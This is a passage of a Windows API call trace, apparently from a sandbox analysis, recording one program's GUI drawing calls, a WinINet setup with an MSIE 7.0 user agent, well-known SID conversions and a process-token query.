[0140.870] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeb9c | out: lptm=0xeeb9c) returned 1
[0140.870] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.870] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeebd4 | out: lptm=0xeebd4) returned 1
[0140.870] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.870] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.870] GetSystemMetrics (nIndex=6) returned 1
[0140.871] GetDC (hWnd=0x0) returned 0x5501085a
[0140.871] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeee84 | out: lptm=0xeee84) returned 1
[0140.871] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.871] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeebc | out: lptm=0xeeebc) returned 1
[0140.871] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.871] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.871] GetSystemMetrics (nIndex=6) returned 1
[0140.873] SysReAllocStringLen (in: pbstr=0x2adf388*=0x0, psz="GET", len=0x3 | out: pbstr=0x2adf388*="GET") returned 1
[0140.873] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0140.873] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0140.873] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0140.873] SysReAllocStringLen (in: pbstr=0x2adf388*="GET", psz="GET", len=0x3 | out: pbstr=0x2adf388*="GET") returned 1
[0140.873] SysReAllocStringLen (in: pbstr=0x2adf3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x2adf3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0140.873] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0xeef20, lpdwBufferLength=0xeef24 | out: lpBuffer=0xeef20, lpdwBufferLength=0xeef24) returned 1
[0140.913] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0xeef20, dwBufferLength=0x4) returned 1
[0140.913] VirtualFree (lpAddress=0x2ae0000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0140.914] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2ad6490, cbMultiByte=3, lpWideCharStr=0xede58, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0140.914] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0140.914] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0140.914] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0140.914] SysReAllocStringLen (in: pbstr=0x2adf388*="GET", psz="GET", len=0x3 | out: pbstr=0x2adf388*="GET") returned 1
[0140.914] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0140.914] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0140.914] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0140.914] SysReAllocStringLen (in: pbstr=0x2adf388*="GET", psz="GET", len=0x3 | out: pbstr=0x2adf388*="GET") returned 1
[0140.919] GetTextExtentPoint32A (in: hdc=0x5501085a, lpString="0", c=1, psizl=0xef014 | out: psizl=0xef014) returned 1
[0140.920] IsIconic (hWnd=0xb019e) returned 0
[0140.920] GetClientRect (in: hWnd=0xb019e, lpRect=0xef014 | out: lpRect=0xef014) returned 1
[0140.920] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.920] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.920] IsIconic (hWnd=0xb019e) returned 0
[0140.920] GetClientRect (in: hWnd=0xb019e, lpRect=0xeef5c | out: lpRect=0xeef5c) returned 1
[0140.920] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.920] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.920] IsIconic (hWnd=0xb019e) returned 0
[0140.920] GetClientRect (in: hWnd=0xb019e, lpRect=0xeef2c | out: lpRect=0xeef2c) returned 1
[0140.920] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.920] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.920] IsIconic (hWnd=0xb019e) returned 0
[0140.920] GetClientRect (in: hWnd=0xb019e, lpRect=0xeef2c | out: lpRect=0xeef2c) returned 1
[0140.920] FlatSB_SetScrollProp (param_1=0xb019e, index=0x200, newValue=0x0, param_4=0) returned 0
[0140.920] GetSysColor (nIndex=20) returned 0xffffff
[0140.920] FlatSB_SetScrollProp (param_1=0xb019e, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0140.920] FlatSB_SetScrollInfo (param_1=0xb019e, code=0, psi=0xeef6a, fRedraw=1) returned 0
[0140.920] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.920] IsIconic (hWnd=0xb019e) returned 0
[0140.920] GetClientRect (in: hWnd=0xb019e, lpRect=0xeef2c | out: lpRect=0xeef2c) returned 1
[0140.920] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.920] IsIconic (hWnd=0xb019e) returned 0
[0140.920] GetClientRect (in: hWnd=0xb019e, lpRect=0xeef2c | out: lpRect=0xeef2c) returned 1
[0140.920] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.920] IsIconic (hWnd=0xb019e) returned 0
[0140.920] GetClientRect (in: hWnd=0xb019e, lpRect=0xeef2c | out: lpRect=0xeef2c) returned 1
[0140.920] FlatSB_SetScrollProp (param_1=0xb019e, index=0x100, newValue=0x0, param_4=0) returned 0
[0140.920] GetSysColor (nIndex=20) returned 0xffffff
[0140.921] FlatSB_SetScrollProp (param_1=0xb019e, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0140.921] FlatSB_SetScrollInfo (param_1=0xb019e, code=1, psi=0xeef6a, fRedraw=1) returned 0
[0140.921] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.921] IsIconic (hWnd=0xb019e) returned 0
[0140.921] GetClientRect (in: hWnd=0xb019e, lpRect=0xeef2c | out: lpRect=0xeef2c) returned 1
[0140.921] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.921] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.921] IsIconic (hWnd=0xb019e) returned 0
[0140.921] GetClientRect (in: hWnd=0xb019e, lpRect=0xeef5c | out: lpRect=0xeef5c) returned 1
[0140.921] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.921] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.921] IsIconic (hWnd=0xb019e) returned 0
[0140.921] GetClientRect (in: hWnd=0xb019e, lpRect=0xeef2c | out: lpRect=0xeef2c) returned 1
[0140.921] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.921] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.921] IsIconic (hWnd=0xb019e) returned 0
[0140.921] GetClientRect (in: hWnd=0xb019e, lpRect=0xeef2c | out: lpRect=0xeef2c) returned 1
[0140.921] FlatSB_SetScrollProp (param_1=0xb019e, index=0x200, newValue=0x0, param_4=0) returned 0
[0140.921] GetSysColor (nIndex=20) returned 0xffffff
[0140.921] FlatSB_SetScrollProp (param_1=0xb019e, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0140.921] FlatSB_SetScrollInfo (param_1=0xb019e, code=0, psi=0xeef6a, fRedraw=1) returned 0
[0140.921] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.921] IsIconic (hWnd=0xb019e) returned 0
[0140.921] GetClientRect (in: hWnd=0xb019e, lpRect=0xeef2c | out: lpRect=0xeef2c) returned 1
[0140.921] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.921] IsIconic (hWnd=0xb019e) returned 0
[0140.921] GetClientRect (in: hWnd=0xb019e, lpRect=0xeef2c | out: lpRect=0xeef2c) returned 1
[0140.921] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.921] IsIconic (hWnd=0xb019e) returned 0
[0140.921] GetClientRect (in: hWnd=0xb019e, lpRect=0xeef2c | out: lpRect=0xeef2c) returned 1
[0140.922] FlatSB_SetScrollProp (param_1=0xb019e, index=0x100, newValue=0x0, param_4=0) returned 0
[0140.922] GetSysColor (nIndex=20) returned 0xffffff
[0140.922] FlatSB_SetScrollProp (param_1=0xb019e, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0140.922] FlatSB_SetScrollInfo (param_1=0xb019e, code=1, psi=0xeef6a, fRedraw=1) returned 0
[0140.922] GetWindowLongA (hWnd=0xb019e, nIndex=-16) returned 116326400
[0140.922] IsIconic (hWnd=0xb019e) returned 0
[0140.922] GetClientRect (in: hWnd=0xb019e, lpRect=0xeef2c | out: lpRect=0xeef2c) returned 1
[0140.922] GetCurrentThreadId () returned 0x8a0
[0140.922] ConvertSidToStringSidA () returned 0x1
[0140.922] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.922] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0140.922] LocalFree (hMem=0x606f40) returned 0x0
[0140.922] LocalFree (hMem=0x5f2f90) returned 0x0
[0140.922] ConvertStringSidToSidA () returned 0x1
[0140.922] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2ad2914, pSourceSid=0x5f2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2ad2914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0140.922] IsValidSid (pSid=0x2ad2914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0140.922] ConvertSidToStringSidA () returned 0x1
[0140.922] LocalFree (hMem=0x606f40) returned 0x0
[0140.922] LocalFree (hMem=0x5f2f90) returned 0x0
[0140.923] ConvertStringSidToSidA () returned 0x1
[0140.923] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2ad702c, pSourceSid=0x5f2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2ad702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0140.923] IsValidSid (pSid=0x2ad702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0140.923] ConvertSidToStringSidA () returned 0x1
[0140.923] LocalFree (hMem=0x606f40) returned 0x0
[0140.923] LocalFree (hMem=0x5f2f90) returned 0x0
[0140.923] ConvertStringSidToSidA () returned 0x1
[0140.923] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2adf5a0, pSourceSid=0x5f2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2adf5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0140.923] IsValidSid (pSid=0x2adf5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0140.923] ConvertSidToStringSidA () returned 0x1
[0140.923] LocalFree (hMem=0x606f40) returned 0x0
[0140.923] LocalFree (hMem=0x5f2f90) returned 0x0
[0140.923] ConvertStringSidToSidA () returned 0x1
[0140.923] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2adf614, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2adf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.923] IsValidSid (pSid=0x2adf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.923] ConvertSidToStringSidA () returned 0x1
[0140.923] LocalFree (hMem=0x606f58) returned 0x0
[0140.923] LocalFree (hMem=0x606f40) returned 0x0
[0140.923] ConvertStringSidToSidA () returned 0x1
[0140.923] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2adf688, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x2adf688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0140.923] IsValidSid (pSid=0x2adf688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0140.923] ConvertSidToStringSidA () returned 0x1
[0140.923] LocalFree (hMem=0x606f58) returned 0x0
[0140.923] LocalFree (hMem=0x606f40) returned 0x0
[0140.923] ConvertStringSidToSidA () returned 0x1
[0140.923] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2adf6fc, pSourceSid=0x606f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x2adf6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0140.923] IsValidSid (pSid=0x2adf6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0140.923] ConvertSidToStringSidA () returned 0x1
[0140.923] LocalFree (hMem=0x5fc1c8) returned 0x0
[0140.923] LocalFree (hMem=0x606f58) returned 0x0
[0140.923] ConvertStringSidToSidA () returned 0x1
[0140.923] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2adf770, pSourceSid=0x606f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x2adf770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0140.923] IsValidSid (pSid=0x2adf770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0140.923] ConvertSidToStringSidA () returned 0x1
[0140.923] LocalFree (hMem=0x5fc1c8) returned 0x0
[0140.924] LocalFree (hMem=0x606f70) returned 0x0
[0140.924] ConvertStringSidToSidA () returned 0x1
[0140.924] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2adf7f8, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x2adf7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0140.924] IsValidSid (pSid=0x2adf7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0140.924] ConvertSidToStringSidA () returned 0x1
[0140.924] LocalFree (hMem=0x5fc1c8) returned 0x0
[0140.924] LocalFree (hMem=0x606f40) returned 0x0
[0140.924] ConvertStringSidToSidA () returned 0x1
[0140.924] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2adf880, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x2adf880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0140.924] IsValidSid (pSid=0x2adf880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0140.924] ConvertSidToStringSidA () returned 0x1
[0140.924] LocalFree (hMem=0x606f58) returned 0x0
[0140.924] LocalFree (hMem=0x606f40) returned 0x0
[0140.924] ConvertStringSidToSidA () returned 0x1
[0140.924] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2adf90c, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x2adf90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0140.924] IsValidSid (pSid=0x2adf90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0140.924] ConvertSidToStringSidA () returned 0x1
[0140.924] LocalFree (hMem=0x606f58) returned 0x0
[0140.924] LocalFree (hMem=0x606f40) returned 0x0
[0140.924] ConvertStringSidToSidA () returned 0x1
[0140.924] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2adf998, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x2adf998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0140.924] IsValidSid (pSid=0x2adf998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0140.924] ConvertSidToStringSidA () returned 0x1
[0140.924] LocalFree (hMem=0x606f58) returned 0x0
[0140.924] LocalFree (hMem=0x606f40) returned 0x0
[0140.924] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.924] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0140.924] GetCurrentThread () returned 0xfffffffe
[0140.925] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.925] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0140.925] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0xee7ec | out: TokenHandle=0xee7ec*=0x29b3756) returned 0
[0140.925] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.925] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0140.925] GetCurrentProcess () returned 0xffffffff
[0140.925] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.925] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0140.925] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x2adfa3c | out: TokenHandle=0x2adfa3c*=0x1d0) returned 1
[0140.925] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.925] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0140.925] MapGenericMask (in: AccessMask=0xee664, GenericMapping=0xee668 | out: AccessMask=0xee664)
[0140.925] MapGenericMask (in: AccessMask=0xee798, GenericMapping=0xee79c | out: AccessMask=0xee798)
[0140.926] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.926] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0140.926] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xee7ac | out: TokenInformation=0x0, ReturnLength=0xee7ac) returned 0
[0140.926] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.926] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0140.926] GetLastError () returned 0x7a
[0140.926] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.926] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0140.926] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x600780, TokenInformationLength=0x24, ReturnLength=0xee7d0 | out: TokenInformation=0x600780, ReturnLength=0xee7d0) returned 1
[0140.926] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2adfab0, pSourceSid=0x600788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2adfab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0140.926] IsValidSid (pSid=0x2adfab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0140.926] ConvertSidToStringSidA () returned 0x1
[0140.926] LocalFree (hMem=0x5f9e80) returned 0x0
[0140.926] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.927] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0140.927] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2adfb34, pSourceSid=0x2adfab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2adfb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0140.927] IsValidSid (pSid=0x2adfb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0140.927] ConvertSidToStringSidA () returned 0x1
[0140.927] LocalFree (hMem=0x5f9e80) returned 0x0
[0140.927] IsValidSid (pSid=0x2adfb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0140.927] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.927] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0140.927] CloseHandle (hObject=0x1d0) returned 1
[0140.927] ConvertStringSidToSidA () returned 0x1
[0140.927] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2adfa54, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x2adfa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0140.927] IsValidSid (pSid=0x2adfa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0140.927] ConvertSidToStringSidA () returned 0x1
[0140.927] LocalFree (hMem=0x606f58) returned 0x0
[0140.927] LocalFree (hMem=0x606f40) returned 0x0
[0140.927] ConvertStringSidToSidA () returned 0x1
[0140.927] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2adfae0, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x2adfae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0140.927] IsValidSid (pSid=0x2adfae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0140.927] ConvertSidToStringSidA () returned 0x1
[0140.927] LocalFree (hMem=0x606f58) returned 0x0
[0140.927] LocalFree (hMem=0x606f40) returned 0x0
[0140.927] ConvertStringSidToSidA () returned 0x1
[0140.927] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2adfbfc, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x2adfbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0140.927] IsValidSid (pSid=0x2adfbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0140.927] ConvertSidToStringSidA () returned 0x1
[0140.927] LocalFree (hMem=0x606f58) returned 0x0
